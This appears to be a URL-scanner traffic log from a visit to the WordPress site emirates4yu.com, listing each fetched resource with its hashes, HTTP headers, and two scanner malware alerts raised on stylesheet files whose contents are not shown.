192.0.76.3200 OK 50 B URL HTTP/2 pixel.wp.com/g.gif?v=ext&j=1%3A9.0.3&blog=125827985&post=1735&tz=5.5&srv=emirates4yu.com&host=emirates4yu.com&ref=&fcp=1375&rand=0.1830355921792789
IP 192.0.76.3:0
File type GIF image data, version 89a, 6 x 5\012- data
Hash e4d673a55c5656f19ef81563fb10884c
1f2d8ed221d39329251ad3a6ff1edb20b7219443
f3a8992acb9ab911e0fa4ae12f4b85ef8e61008619f13ee51c7a121ff87f63b1
GET /g.gif?v=ext&j=1%3A9.0.3&blog=125827985&post=1735&tz=5.5&srv=emirates4yu.com&host=emirates4yu.com&ref=&fcp=1375&rand=0.1830355921792789 HTTP/1.1
Host: pixel.wp.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/gif
content-length: 50
cache-control: no-cache
access-control-allow-origin: *
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2018/12/19.png
35.190.203.220200 OK 4.4 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2018/12/19.png
IP 35.190.203.220:0
File type PNG image data, 148 x 162, 8-bit/color RGBA, non-interlaced\012- data
Hash e7be4f692aea9e0383aa9ea868c7ffd8
99f9ef59c0a305a17128c9c3fa10976a05389f72
8d213e312365c53415370ec80f096cac8a282495bc0b0cc067b75546b918cdd2
GET /wp-content/uploads/2018/12/19.png HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Cookie: tk_or=%22%22; tk_r3d=%22%22; tk_lr=%22%22; pll_language=fr
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/png
content-length: 4371
last-modified: Tue, 18 Dec 2018 12:22:05 GMT
etag: "5c18e66d-1113"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/woocommerce/assets/css/blocks/style.css?ver=3.6.7
35.190.203.220200 OK 5.9 kB URL HTTP/2 emirates4yu.com/wp-content/plugins/woocommerce/assets/css/blocks/style.css?ver=3.6.7
IP 35.190.203.220:0
File type ASCII text, with very long lines (4166)
Hash 78da0b50243f20ee1e9f91853cba2dbb
609c6abb42ed926f4402f6be4970785422f2e316
372fd821ed02b2f3133ae3f7fddbd317c7eeedd0685061934333d6d1991d2423
GET /wp-content/plugins/woocommerce/assets/css/blocks/style.css?ver=3.6.7 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: text/css
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Fri, 11 Mar 2022 00:15:40 GMT
etag: W/"622a94ac-18da"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-includes/css/dist/block-library/style.min.css?ver=6.0.3
35.190.203.220200 OK 14 kB URL HTTP/2 emirates4yu.com/wp-includes/css/dist/block-library/style.min.css?ver=6.0.3
IP 35.190.203.220:0
File type ASCII text, with very long lines (43771)
Hash 762470181f3432dca16adc22d3e0b11e
8d7e20df823b64e89bfe307a41e217b16b4a6e89
cc53f2bf13f731f6a5652563b57366df3aef309c5f79b90d97b7e06ddad5461a
Analyzer Verdict Alert fortinet Malware
GET /wp-includes/css/dist/block-library/style.min.css?ver=6.0.3 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: text/css
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Mon, 04 Jul 2022 12:10:37 GMT
etag: W/"62c2d8bd-15b64"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/beaver-builder-lite-version/fonts/fontawesome/css/all.min.css?ver=2.2.6.3
35.190.203.220200 OK 22 kB URL HTTP/2 emirates4yu.com/wp-content/plugins/beaver-builder-lite-version/fonts/fontawesome/css/all.min.css?ver=2.2.6.3
IP 35.190.203.220:0
File type ASCII text, with very long lines (55782)
Hash 0a22757d3eac2daae93314edadc49e62
61f1383febae7c9486e74fb16989dde3e3441bf4
2978484036eafa517d6f2eeccce3afc7e421d1482da62dbe349e69f96f815204
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/beaver-builder-lite-version/fonts/fontawesome/css/all.min.css?ver=2.2.6.3 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: text/css
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Fri, 20 Dec 2019 16:26:21 GMT
etag: W/"5dfcf62d-da9f"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/beaver-builder-lite-version/fonts/fontawesome/css/v4-shims.min.css?ver=2.2.6.3
35.190.203.220200 OK 6.6 kB URL HTTP/2 emirates4yu.com/wp-content/plugins/beaver-builder-lite-version/fonts/fontawesome/css/v4-shims.min.css?ver=2.2.6.3
IP 35.190.203.220:0
File type ASCII text, with very long lines (26440)
Hash f1600ab083ba0458dbb5fbbafdd5ed48
e7656fe15a631fbd061a3d15dc4f940dd4be28b9
40140b2dbcaa89b345989a060e4dc9dfe5ddf2af33f85f813e59d08ed515f319
GET /wp-content/plugins/beaver-builder-lite-version/fonts/fontawesome/css/v4-shims.min.css?ver=2.2.6.3 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: text/css
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Fri, 20 Dec 2019 16:26:21 GMT
etag: W/"5dfcf62d-6801"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/beaver-builder-lite-version/css/jquery.magnificpopup.min.css?ver=2.2.6.3
35.190.203.220200 OK 4.6 kB URL HTTP/2 emirates4yu.com/wp-content/plugins/beaver-builder-lite-version/css/jquery.magnificpopup.min.css?ver=2.2.6.3
IP 35.190.203.220:0
File type ASCII text, with very long lines (5410), with no line terminators
Hash b7272b82a4933c1069a61aadd8479f34
20661316e916872d193f87f04ce414de70239d20
0ff2d2b5f0bb2dddb4b6ffbdd9f3c64f114696131b4252457362bca41e7188e7
GET /wp-content/plugins/beaver-builder-lite-version/css/jquery.magnificpopup.min.css?ver=2.2.6.3 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: text/css
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Fri, 20 Dec 2019 16:26:21 GMT
etag: W/"5dfcf62d-1522"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/easy-columns/css/easy-columns.css
35.190.203.220200 OK 1.2 kB URL HTTP/2 emirates4yu.com/wp-content/plugins/easy-columns/css/easy-columns.css
IP 35.190.203.220:0
File type ASCII text, with CRLF line terminators
Hash cf8dc41b1fb0c4d8e4a73466a7a41c8e
a07071145b84ff5c3be113b4f75775b234745070
f869306e60143f28cef5fb923fedda3f054f843fca550fba11c4d2f8d2f7ae37
GET /wp-content/plugins/easy-columns/css/easy-columns.css HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: text/css
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Thu, 05 Oct 2017 11:37:07 GMT
etag: W/"59d61963-b20"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
player.vimeo.com/video/307072005?autoplay=1&loop=0&title=0&portrait=0&byline=0&color=c4944d&autopause=0&autoplay=1
162.159.138.60200 OK 17 kB URL HTTP/1.1 player.vimeo.com/video/307072005?autoplay=1&loop=0&title=0&portrait=0&byline=0&color=c4944d&autopause=0&autoplay=1
IP 162.159.138.60:0
File type HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, Unicode text, UTF-8 text, with very long lines (50233), with no line terminators
Hash 06c4fb24dd55d43030895b1cede9365c
e44b012c34b3a7b0f8e65ae0c5c77efd1770745a
92e5ab16d674cddb2efe1e156bbe1f6c2c6ce01500994b85de472ef883bdb15c
GET /video/307072005?autoplay=1&loop=0&title=0&portrait=0&byline=0&color=c4944d&autopause=0&autoplay=1 HTTP/1.1
Host: player.vimeo.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
HTTP/1.1 200 OK
Date: Fri, 25 Nov 2022 12:02:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
x-xss-protection: 1; mode=block
content-security-policy: script-src 'self' 'unsafe-inline' 'unsafe-eval' blob: resource: https://f.vimeocdn.com https://vimeo.com https://js-agent.newrelic.com https://imasdk.googleapis.com/ https://adservice.google.com/ https://s0.2mdn.net/instream/video/ https://bam.nr-data.net https://src.litix.io https://www.gstatic.com https://cdn.streamroot.io https://cdn.kollective.app/ https://wirewax.s3.eu-west-1.amazonaws.com https://edge-assets.wirewax.com https://embedder-sdk.wirewax.com https://embedder-sdk.wirewax.tv https://f.vimeocdn.com; style-src 'self' 'unsafe-inline' https://f.vimeocdn.com https://fonts.googleapis.com https://edge-assets.wirewax.com https://f.vimeocdn.com; connect-src 'self' ws: wss: https://vimeo.com https://vimeo.dev https://api.vimeo.com https://api.vimeo.dev https://*.ci.vimeows.com https://csi.gstatic.com https://fresnel-player-staging.vimeows.com https://fresnel-event-staging.vimeows.com https://player-telemetry.vimeo.com https://*.akamaized.net https://*.akamaized-staging.net https://*.vimeocdn.com https://netflux.cloud.vimeo.com https://lic.staging.drmtoday.com https://lic.drmtoday.com https://wv.service.expressplay.com https://fp.service.expressplay.com https://pr.service.expressplay.com https://sentry.io https://*.ingest.sentry.io https://storage.googleapis.com https://bam.nr-data.net https://live-api.cloud.vimeo.com https://live-api-dev.cloud.vimeo.com https://*.litix.io/ https://collector.vhx.tv https://collector.vhxstaging.com https://*.dna-delivery.com https://*.kollective.app/ https://mimir.cloud.vimeo.com https://*.wirewax.com https://*.wirewax.tv https://wirewax.s3.eu-west-1.amazonaws.com https://sqs.us-east-1.amazonaws.com https://sqs.eu-west-1.amazonaws.com https://s3-eu-west-1.amazonaws.com https://cognito-identity.us-east-1.amazonaws.com https://cognito-identity.eu-west-1.amazonaws.com; media-src 'self' blob: https://*.vimeocdn.com https://*.akamaized.net https://*.akamaized-staging.net https://*.gvt1.com https://live-api.cloud.vimeo.com https://live-api-dev.cloud.vimeo.com https://devcaptions.cloud.vimeo.com/; object-src 'self' https://*.vimeocdn.com https://*.akamaized.net https://*.akamaized-staging.net; default-src 'none'; font-src https://edge-assets.wirewax.com https://player.vimeo.com https://fonts.gstatic.com; img-src 'self' data: https://i.vimeocdn.com https://secure-b.vimeocdn.com https://f.vimeocdn.com https://vimeo.com https://secure.gravatar.com https://i0.wp.com https://i1.wp.com https://i2.wp.com https://pagead2.googlesyndication.com https://player.vimeo.com https://*.ci.vimeows.com https://videoapi-sprites.vimeocdn.com https://i.vimeocdn.com https://wirewax.s3.eu-west-1.amazonaws.com https://studio-media.wirewax.com https://edge-assets.wirewax.com https://maps.googleapis.com https://f.vimeocdn.com; frame-src 'self' https://*
x-content-type-options: nosniff
strict-transport-security: max-age=31536000; includeSubDomains; preload
link: <https://i.vimeocdn.com>; rel=preconnect; crossorigin, <https://f.vimeocdn.com>; rel=preconnect; crossorigin, <https://fresnel.vimeocdn.com>; rel=preconnect; crossorigin
p3p: CP="This is not a P3P policy! See https://vimeo.com/privacy"
expires: Fri, 25 Nov 2022 12:12:01 GMT
x-host: player-57c7694bdc-6qwpb
via: 1.1 varnish, 1.1 varnish
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
x-varnish-cache: 0
x-vserver: playproxy-rollout-prod-varnish-9
x-backend-proxy: playproxy10
x-bapp-server: player-57c7694bdc-6qwpb
Age: 0
X-Served-By: cache-bma1626-BMA
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1669377721.403064,VS0,VE331
Vary: Accept-Encoding
X-Player-Backend: p
CF-Cache-Status: DYNAMIC
Set-Cookie: __cf_bm=8bjlwuEgc66pG6F7sd0uMSsIrdrfBa2l0DMyn.tRF.A-1669377721-0-ASXbD0PqpvV7ulmjKl9uGHggZtXJibe14Z2GP9KDNqKSa7EI4ju4XXA0JM4O4Iobi2j+ypGGR1ppP8Zx5lrAdDw=; path=/; expires=Fri, 25-Nov-22 12:32:01 GMT; domain=.vimeo.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 76fa3ba68a62b52d-OSL
Content-Encoding: gzip
f.vimeocdn.com/p/4.14.1/css/player.css
151.101.86.109200 OK 21 kB URL HTTP/2 f.vimeocdn.com/p/4.14.1/css/player.css
IP 151.101.86.109:0
File type ASCII text, with very long lines (65495)
Hash 4acf7af3b78cc35650da87ee77464c29
abe870c3258849b8286439c8e06b7b885a1f1ac3
ed7715a1dab6ae7896cca6ae124ce68f61b8a502a7f468001142fdf9a81a3626
GET /p/4.14.1/css/player.css HTTP/1.1
Host: f.vimeocdn.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://player.vimeo.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
content-type: text/css
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Fri, 25 Nov 2022 12:02:01 GMT
age: 235409
x-served-by: cache-iad-kiad7000129-IAD, cache-bma1680-BMA
x-cache: HIT, HIT
x-cache-hits: 3, 60426
x-timer: S1669377722.841840,VS0,VE0
vary: Accept-Encoding,x-http-method-override
cache-control: max-age=1209600
access-control-allow-origin: *
content-length: 20726
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/themes/jupiter/assets/js/min/full-scripts.6.1.5.js?ver=1545605643
35.190.203.220200 OK 192 kB URL HTTP/2 emirates4yu.com/wp-content/themes/jupiter/assets/js/min/full-scripts.6.1.5.js?ver=1545605643
IP 35.190.203.220:0
File type ASCII text, with very long lines (31986)
Size 192 kB (192515 bytes)
Hash 536f688a6619ba97c46c609ba221bbe5
203e720a85ad9d965873d110c20c2684ec4f99ff
f9f75cf8e2bfe0378fcee0941755adc90aa9964f9e15df21a7681f3e10c8b733
GET /wp-content/themes/jupiter/assets/js/min/full-scripts.6.1.5.js?ver=1545605643 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Sun, 23 Dec 2018 22:54:03 GMT
etag: W/"5c20120b-4518b"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
f.vimeocdn.com/p/4.14.1/js/vendor.module.js
151.101.86.109200 OK 116 kB URL HTTP/2 f.vimeocdn.com/p/4.14.1/js/vendor.module.js
IP 151.101.86.109:0
File type ASCII text, with very long lines (65457)
Size 116 kB (116187 bytes)
Hash 30972a3e9883ce81e7bb54ca377da88f
19077360603241f1fb218c44027d7d1437770d8d
10fb36a7c941c7565c0cb906cfeafc288aeaca33c293bbf3d1353f418eeb7d8f
GET /p/4.14.1/js/vendor.module.js HTTP/1.1
Host: f.vimeocdn.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://player.vimeo.com
Connection: keep-alive
Referer: https://f.vimeocdn.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
content-type: application/javascript
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Fri, 25 Nov 2022 12:02:02 GMT
age: 235410
x-served-by: cache-iad-kjyo7100028-IAD, cache-bma1680-BMA
x-cache: HIT, HIT
x-cache-hits: 3, 58986
x-timer: S1669377722.016002,VS0,VE0
vary: Accept-Encoding,x-http-method-override
cache-control: max-age=1209600
access-control-allow-origin: *
content-length: 116187
X-Firefox-Spdy: h2
f.vimeocdn.com/js_opt/modules/utils/vuid.min.js
151.101.86.109200 OK 997 B URL HTTP/2 f.vimeocdn.com/js_opt/modules/utils/vuid.min.js
IP 151.101.86.109:0
File type ASCII text, with very long lines (1839)
Hash b81408535edef4b73951fa7683a0ecb4
2be1041a686c8d5130ce96600bc7ec68538b4cd9
7b68a0f94a2376708329d7fabc0000c92eb45755267bde5dc8983184b77f3ec7
GET /js_opt/modules/utils/vuid.min.js HTTP/1.1
Host: f.vimeocdn.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://player.vimeo.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
content-type: application/javascript
content-encoding: gzip
cache-control: public, max-age=2592000
timing-allow-origin: *
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Fri, 25 Nov 2022 12:02:02 GMT
age: 585883
x-served-by: cache-iad-kiad7000106-IAD, cache-bma1680-BMA
x-cache: HIT, HIT
x-cache-hits: 30, 104909
x-timer: S1669377722.196314,VS0,VE0
vary: Accept-Encoding,x-http-method-override
content-length: 997
X-Firefox-Spdy: h2
r3.o.lencr.org/
23.36.77.32200 OK 503 B IP 23.36.77.32:0
ASN #20940 Akamai International B.V.
Hash 6827d82f488045e02e40d6a2fdbae4b3
4944139a4b08769511ffc6aa913857d88a0db7bc
0e4ef6ddef97ec03d43df4c0bada61d792b9f030e4d9fab5bd3cf904aeaa3bc9
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "0E4EF6DDEF97EC03D43DF4C0BADA61D792B9F030E4D9FAB5BD3CF904AEAA3BC9"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=10198
Expires: Fri, 25 Nov 2022 14:52:00 GMT
Date: Fri, 25 Nov 2022 12:02:02 GMT
Connection: keep-alive
r3.o.lencr.org/
23.36.77.32200 OK 503 B IP 23.36.77.32:0
ASN #20940 Akamai International B.V.
Hash 6827d82f488045e02e40d6a2fdbae4b3
4944139a4b08769511ffc6aa913857d88a0db7bc
0e4ef6ddef97ec03d43df4c0bada61d792b9f030e4d9fab5bd3cf904aeaa3bc9
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "0E4EF6DDEF97EC03D43DF4C0BADA61D792B9F030E4D9FAB5BD3CF904AEAA3BC9"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=10198
Expires: Fri, 25 Nov 2022 14:52:00 GMT
Date: Fri, 25 Nov 2022 12:02:02 GMT
Connection: keep-alive
r3.o.lencr.org/
23.36.77.32200 OK 503 B IP 23.36.77.32:0
ASN #20940 Akamai International B.V.
Hash 6827d82f488045e02e40d6a2fdbae4b3
4944139a4b08769511ffc6aa913857d88a0db7bc
0e4ef6ddef97ec03d43df4c0bada61d792b9f030e4d9fab5bd3cf904aeaa3bc9
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "0E4EF6DDEF97EC03D43DF4C0BADA61D792B9F030E4D9FAB5BD3CF904AEAA3BC9"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=10198
Expires: Fri, 25 Nov 2022 14:52:00 GMT
Date: Fri, 25 Nov 2022 12:02:02 GMT
Connection: keep-alive
r3.o.lencr.org/
23.36.77.32200 OK 503 B IP 23.36.77.32:0
ASN #20940 Akamai International B.V.
Hash 6827d82f488045e02e40d6a2fdbae4b3
4944139a4b08769511ffc6aa913857d88a0db7bc
0e4ef6ddef97ec03d43df4c0bada61d792b9f030e4d9fab5bd3cf904aeaa3bc9
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "0E4EF6DDEF97EC03D43DF4C0BADA61D792B9F030E4D9FAB5BD3CF904AEAA3BC9"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=10198
Expires: Fri, 25 Nov 2022 14:52:00 GMT
Date: Fri, 25 Nov 2022 12:02:02 GMT
Connection: keep-alive
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fe021fc4e-f76c-4fe9-9470-b59452c93459.jpeg
34.120.237.76200 OK 11 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fe021fc4e-f76c-4fe9-9470-b59452c93459.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash eb94ecb5881a7e49d964e4287d11e7a4
4b131a189db1b615e2519a28cad83d78297ab67f
f3693e29eb7b72361093434142e3f18969c1a0b02350fab430fa29c7c127bd1a
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fe021fc4e-f76c-4fe9-9470-b59452c93459.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 11401
x-amzn-requestid: 3bc374eb-7d70-4b95-94a7-2ad06cae4726
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cEvCtHcmoAMFxgw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637e9211-333793987245ff9e741b9aed;Sampled=0
x-amzn-remapped-date: Wed, 23 Nov 2022 21:35:13 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: kkI9Vh2vZeJPwz2JVL5MErsBBwk8-2Jo49yc0sFqv5pxIyBi6azFIw==
via: 1.1 8f22423015641505b8c857a37450d6c0.cloudfront.net (CloudFront), 1.1 d6b180eb367f7de26d67a9f3901b96a6.cloudfront.net (CloudFront), 1.1 google
date: Thu, 24 Nov 2022 22:00:34 GMT
age: 50488
etag: "4b131a189db1b615e2519a28cad83d78297ab67f"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
i.vimeocdn.com/video/746942421-fb2e650771298bc27cc72cd0572616ddd0b3e167f2383463df2b7f9bfa88b69b-d?mw=600&mh=338
